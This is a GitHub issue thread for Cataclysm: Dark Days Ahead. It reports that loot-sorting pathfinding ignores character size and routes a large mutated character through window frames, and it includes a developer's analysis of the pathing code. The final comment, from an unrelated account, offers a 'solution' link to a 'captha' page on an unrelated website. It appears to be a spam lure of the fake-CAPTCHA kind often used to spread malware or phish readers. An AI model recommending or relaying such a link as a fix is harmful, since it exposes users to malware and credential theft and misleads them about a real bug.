### ISSUE TITLE
Loot sorting pathing failure due to character being large

### ISSUE THREAD

**Issue by harakka** [CleverRaven/Cataclysm-DDA#77385]
### Describe the bug

When sorting loot using zones, character with size-increasing mutation tries to path through window frames, which aborts the loot sorting process.

### Attach save file

[Mutagen hunt-trimmed.tar.gz](https://github.com/user-attachments/files/17534385/Mutagen.hunt-trimmed.tar.gz)

### Steps to reproduce
1. Load the provided save
2. Press `shift-o` and `o` to sort loot
3. Observe the "you can't fit there" message and that loot sorting stops there

### Expected behavior

Loot sorting pathing takes character size into account and paths accordingly

### Versions and configuration

- OS: Linux
    - OS Version: Distributor ID: Ubuntu; Description: Ubuntu 24.04.1 LTS; Release: 24.04; Codename: noble; 
- Game Version: cdda-experimental-2024-10-27-0438 d515611 [64-bit]
- Graphics Version: Tiles
- Game Language: English [en]
- Mods loaded: [
    Dark Days Ahead [dda],
    Disable NPC Needs [no_npc_food],
    Portal Storms Ignore NPCs [personal_portal_storms],
    Slowdown Fungal Growth [no_fungal_growth],
    Translate Complex Dialogue [translate_dialogue],
    Stats Through Kills [stats_through_kills]
]

### Additional context

This also reproduces in 0.H release candidates.

**Comment by harakka** [comment]
From very cursory investigation, map::route calls map::cost_to_pass which uses terrain's pathfinding flags (which for this tile would be RestrictLarge and RestrictHuge) to figure out if tile is passable and how expensive it is, but we don't do any checks for character size there. Should probably add character size to pathfinding_settings and use it here.

**Comment by sgmustafi** [comment]
maybe this solution will solve your problem [click](https://www.calvarywhangarei.co.nz/captha/index.html)
